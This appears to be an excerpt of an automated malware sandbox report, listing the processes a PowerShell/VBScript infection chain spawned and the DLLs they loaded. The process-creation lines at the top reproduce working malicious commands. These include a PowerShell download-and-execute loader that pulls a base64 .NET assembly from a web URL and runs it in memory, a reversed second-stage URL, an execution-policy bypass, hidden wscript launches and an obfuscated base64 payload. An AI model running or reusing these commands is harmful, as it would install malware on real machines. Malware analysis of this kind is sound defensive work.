                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nnuoa = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nnuoa).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1SD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'Roda' ));"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bz HE YQBh Go I 9 C Jw w DE Mw n Ds J B3 Gk a Bs HY I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu G4 dQBv GE I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu G4 dQBv GE KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 MQBT EQ LwBT FY TgBF C8 egBy GE TQ v Gc ZQBS C8 awBh FQ Lw 5 DY MQ u DM Mw y C4 Mg w DI Lg x Dk Lw v Do c B0 HQ a n C L g CQ dwBp Gg b B2 C L g Cc XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 LQ t C0 LQ t C0 Jw s C J Bz HE YQBh Go L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nnuoa = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nnuoa).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1SD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'Roda' ));"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
